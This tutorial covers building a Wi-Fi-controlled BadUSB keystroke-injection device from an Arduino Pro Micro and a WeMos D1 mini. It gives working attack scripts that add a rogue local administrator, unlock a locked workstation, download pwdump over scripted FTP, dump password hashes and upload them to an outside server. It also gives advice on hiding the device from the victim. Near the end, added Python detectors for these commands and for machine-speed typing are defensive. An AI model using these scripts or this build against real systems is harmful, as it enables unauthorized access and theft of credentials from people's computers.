Remote-Controlled Evil Duck: Building and Programming a Wi-Fi BadUSB
You’ve probably heard stories about hackers using USB devices that look like regular flash drives to carry out attacks. All it takes is plugging such a device into a server to gain remote control. This is reminiscent of the infamous Rubber Ducky prototype. However, the classic “evil duck” is a one-time tool: it runs a single script with pre-set actions. Today, we’ll build a much more versatile version.
Disclaimer: This article is intended for white-hat hackers, professional pentesters, and CISOs. Neither the author nor the editors are responsible for any harm caused by the use of this material.
Beyond the Rubber Ducky
You’ve likely heard of the Rubber Ducky—a BadUSB device used for HID attacks. These devices emulate a keyboard, allowing them to send any commands as if typed by the user. They contain a simple microcontroller and memory where a sketch (Arduino code) is stored, defining the emulation and actions to perform—usually a sequence of keystrokes.
The main danger of this attack method is its stealth and speed. However, there are drawbacks:
- You need to know the full configuration of the target computer.
- You must test the attack on a similar system and adjust delays as needed. If a single keystroke is mistimed, the attack fails.
- You can only use one script at a time. You can’t add functions on the fly or interrupt and restart actions.
We’ll build a device that overcomes these limitations.
Building the Wi-Fi Ducky
This is essentially a Rubber Ducky with a Wi-Fi module. When plugged in, the script doesn’t run immediately (though you can enable this). Instead, it creates a Wi-Fi access point, waiting for you to connect from your phone or laptop and trigger actions at your convenience.
You could use an Arduino MKR1000 with an Atmel ATSAMW25 Wi-Fi module and the WiFi101 library (about $35), or a ready-made Cactus WHID ($14), but both have limitations. Instead, we’ll build a cheaper (under $10) and more functional device called the Wi-Fi Ducky, created by Stefan Kremser (“Kosmoplovci”). The hardware is available as DIY modules on AliExpress, with code on GitHub, but we’ll take a slightly different approach.
You’ll need two devices:
- Arduino Pro Micro
- WeMos D1 mini with an ESP-8266EX microcontroller and 802.11b/g/n Wi-Fi
We’ll connect them, but first, let’s flash the firmware.
Flashing the Arduino Pro Micro
- Download and install the Arduino IDE. This also installs all necessary drivers.
- Connect the Arduino Pro Micro to your computer using an OTG adapter or appropriate cable (it uses mini-USB).
- In the Arduino IDE, select Arduino/Genuino Micro under Tools > Board, and select the correct COM port.
- Get the sketch from the project page. The sketch converts STRING commands into Arduino syntax (Keyboard.print("")) and activates the required pins.
- Copy and paste the sketch into the Arduino IDE, click “Upload,” and wait for confirmation. The controller will now activate the TX, RX, GND, and RAW pins and wait for commands.
Flashing the WeMos D1 mini
- Switch from micro-USB to USB Type-A for connection.
- When first connected, Windows may not recognize the device. Download the CH341 driver from the official site, extract, and install it as administrator. The device should appear as USB-SERIAL CH340 in Device Manager.
- Download the NodeMCU firmware programmer from GitHub (choose the version for your OS).
- Download the firmware (e.g., esp8266_wifi_duck_4mb.bin).
- Open the firmware programmer, select the correct COM port, go to the Config tab, click the gear icon, and select the firmware file (address: 0x00000). In the Advanced tab, set Baudrate to 115200. Click “Flash” in the Operation tab and wait for the process to complete.
Soldering the Boards
Once both boards are flashed, connect them as follows:
Arduino | <–> | WeMos |
---|---|---|
TX | <–> | RX |
RX | <–> | TX |
GND | <–> | GND |
RAW | <–> | 5V |
It’s best to test the setup on a breadboard before soldering. Connect the Arduino Pro Micro to your computer and test functionality. If it works, solder the connections. There are no tiny parts, so even beginners can handle it.
Testing and Features
After soldering, check that both boards still work. Connect the Arduino Pro Micro to your computer and wait for the HID driver to install. The Arduino should show two red and one green LED.
From your phone, tablet, or laptop, look for a new Wi-Fi access point named WiFi Duck. If you see it, everything is working. Connect to it (default password: quackquack—you can change this later). Open a browser and go to 192.168.4.1 to access the device’s control panel.
The web interface is simple, with four tabs:
- Scripts: Manage and upload scripts in .ino or .txt format. You can write your own or find ready-made ones online. There’s plenty of memory—almost 3 MB.
- Live Execute: Write and run scripts instantly or save them for later. The scripting language is different from standard Arduino, but instructions are provided below the input field.
- Settings: Change the access point name, password, hide the network, or set a script to run automatically when the device is plugged in.
- Info: Project links, SDK, web server, script interpreter, and firmware update options.
Writing Attack Scripts
Your cyber weapon is ready—now load it with scripts. Pay attention to DELAY commands to ensure the code doesn’t run before the target system is ready. Use longer delays if the victim’s system is slower than your test machine (e.g., no SSD, less RAM, slower CPU).
Example: Wi-Fi Ducky is plugged into the target, and you’re nearby. There’s an active user account with local admin rights. Here’s a script to create a new user and add it to the Administrators group:
```
GUI r
STRING cmd
ENTER
DELAY 100
STRING net user hacker qwerty /add
DELAY 200
STRING net localgroup administrators hacker /add
ALT KEY_F4
```
If run as a standard user, you’ll get “System error 5. Access denied.” As admin, it completes in under half a second and closes the console window.
For Russian Windows, use the group name in Russian: net localgroup Администраторы hacker /add. See the article “How to Make BadUSB Work with Different Keyboard Layouts” for more details.
Next, wait for the user to lock the computer and leave (e.g., for lunch). Run this script to unlock the computer with your new account:
```
TAB
DELAY 30
TAB
DELAY 30
ENTER
TAB
DELAY 30
TAB
DELAY 30
ENTER
```
Voilà! You’re now using the victim’s computer with your new account (assuming only two accounts exist).
To download pwdump from a prepared FTP server:
```
GUI r
DELAY 30
STRING cmd
ENTER
DELAY 30
STRING echo open > ftp.txt & echo ip-ftp >> ftp.txt & echo user >> ftp.txt & echo password >> ftp.txt & echo get pwdump.exe >> ftp.txt & echo bye >> ftp.txt
ENTER
DELAY 50
STRING ftp -s:ftp.txt
DELAY 3000
```
Then dump password hashes:
```
STRING pwdump.exe >> pass.txt
```
And upload the file back to the server:
```
STRING echo open > ftp1.txt & echo ip-ftp >> ftp1.txt & echo user >> ftp1.txt & echo password >> ftp1.txt & echo send pass.txt >> ftp1.txt & echo bye >> ftp1.txt
DELAY 50
STRING ftp -s:ftp1.txt
```
Use rainbow tables to crack the hashes and gain more accounts for further attacks. The device remains in the computer, and you can do anything within Wi-Fi range.
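From the defender's side, every command typed by the scripts above leaves a process-creation record. The following is an added example, not code from the original article or the Wi-Fi Ducky project: it matches such records against the command lines shown above and alerts when two or more distinct ones appear on a host within a minute. The event tuples, host names, timestamps and the 60-second window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Command lines typed by the scripts in this article, as they appear in process-creation logs.
RULES = {
    "local_user_created": re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b", re.I),
    "added_to_local_group": re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+.+\s/add\b", re.I),
    "scripted_ftp": re.compile(r"\bftp(\.exe)?\s+-s:", re.I),
    "hash_dump_tool": re.compile(r"\bpwdump", re.I),
}

# Constructed sample records: (timestamp, host, command line).
EVENTS = [
    ("2024-05-02T12:01:10", "WS-17", "net user hacker qwerty /add"),
    ("2024-05-02T12:01:10", "WS-17", "net localgroup administrators hacker /add"),
    ("2024-05-02T12:31:42", "WS-17", "ftp -s:ftp.txt"),
    ("2024-05-02T12:31:50", "WS-17", "pwdump.exe"),
    ("2024-05-02T09:15:00", "WS-03", "net user"),             # benign account listing
    ("2024-05-02T09:20:00", "WS-03", "ftp ftp.example.org"),  # interactive ftp, no -s:
]

def match_events(events):
    """Return sorted (time, host, rule) for every record that hits a rule."""
    hits = []
    for ts, host, cmdline in events:
        for name, rx in RULES.items():
            if rx.search(cmdline):
                hits.append((datetime.fromisoformat(ts), host, name))
    return sorted(hits)

def correlate(hits, window=timedelta(seconds=60)):
    """Cluster hits per host; report clusters containing two or more distinct rules."""
    clusters, alerts = {}, []
    for ts, host, rule in hits:
        runs = clusters.setdefault(host, [])
        if runs and ts - runs[-1][-1][0] <= window:
            runs[-1].append((ts, rule))       # continues the current cluster
        else:
            runs.append([(ts, rule)])         # pause exceeded: start a new cluster
    for host, runs in sorted(clusters.items()):
        for run in runs:
            rules = sorted({r for _, r in run})
            if len(rules) >= 2:
                alerts.append((host, run[0][0].isoformat(), rules))
    return alerts

if __name__ == "__main__":
    for alert in correlate(match_events(EVENTS)):
        print(alert)
```

The same account changes also surface in the Windows Security log as event 4720 (user account created) and 4732 (member added to a local group), which makes a useful second source when command-line auditing is not enabled.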
Improvements and Customization
This is already a solid hacker device, but there’s always room for improvement:
- To avoid drawing attention, replace or cover the LEDs with jumpers or nail polish.
- Enclose the boards in a case to avoid suspicion from exposed wires.
- If you can open the target’s case, use a cable to connect directly to the motherboard, making detection less likely.
- If the device is inside the case, use the D1 mini Pro V1.1.0, which supports an external antenna for greater range.
Conclusion
We’ve built an advanced version of the Rubber Ducky—the Wi-Fi Ducky. It’s a dangerous device the size of a matchbox, and building it is affordable and straightforward thanks to ready-made Arduino boards and sketches. While prototyping is done with dev boards, you can later design a custom PCB with the same microcontroller and Wi-Fi module, omitting unnecessary parts. Manufacturing can be ordered from various services for as little as $5.
You can store scripts in the Wi-Fi Ducky’s memory and execute them anytime on any OS—there’s enough space for thousands of lines of code. Remote control makes it far more versatile than local BadUSB devices, letting you do anything on a remote computer as if you were sitting at its keyboard.
To defend against such devices, block new HID devices via OS settings or endpoint security solutions (Kaspersky, HEAT Software, etc.), just as you would with a regular Rubber Ducky.
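Where HID devices cannot be blocked outright, injected keystrokes can still be told apart from typing by their timing. The following is an added example, not code from the original article or from any endpoint product: it flags a keyboard whose keystroke bursts arrive at machine speed, and it checks every burst rather than only the seconds after enumeration, because the device described here waits for a remote trigger. The per-device key timestamps (assumed to come from an endpoint agent), device names and thresholds are constructed assumptions.

```python
from statistics import median

HUMAN_FLOOR_MS = 30   # assumed: a sustained median gap below this is not human typing
BURST_GAP_MS = 1000   # assumed: a pause longer than this ends a burst
MIN_KEYS = 8          # ignore bursts too short to judge

# Constructed sample: enumeration time per keyboard and (time_ms, device) key events.
ATTACH_MS = {"kbd-builtin": 0, "usb-new": 100_000}
KEYS = (
    [(5_000 + i * 180 + (i % 3) * 20, "kbd-builtin") for i in range(40)]  # human pace
    + [(2_500_000 + i * 5, "usb-new") for i in range(20)]  # idle 40 min, then 5 ms gaps
)

def bursts(times):
    """Split sorted key times into runs separated by pauses longer than BURST_GAP_MS."""
    run = []
    for t in times:
        if run and t - run[-1] > BURST_GAP_MS:
            yield run
            run = []
        run.append(t)
    if run:
        yield run

def flag_injectors(attach_ms, keys):
    """Return (device, ms_idle_before_burst, keys_in_burst) for machine-speed keyboards."""
    findings = []
    for dev, t0 in sorted(attach_ms.items()):
        times = sorted(t for t, d in keys if d == dev)
        for run in bursts(times):
            gaps = [b - a for a, b in zip(run, run[1:])]
            if len(run) >= MIN_KEYS and median(gaps) < HUMAN_FLOOR_MS:
                findings.append((dev, run[0] - t0, len(run)))
                break  # one finding per device is enough to alert
    return findings

if __name__ == "__main__":
    print(flag_injectors(ATTACH_MS, KEYS))
```

A script padded with long DELAY commands will stay under this threshold, so timing is a complement to device control policy and process-creation monitoring, not a replacement for them.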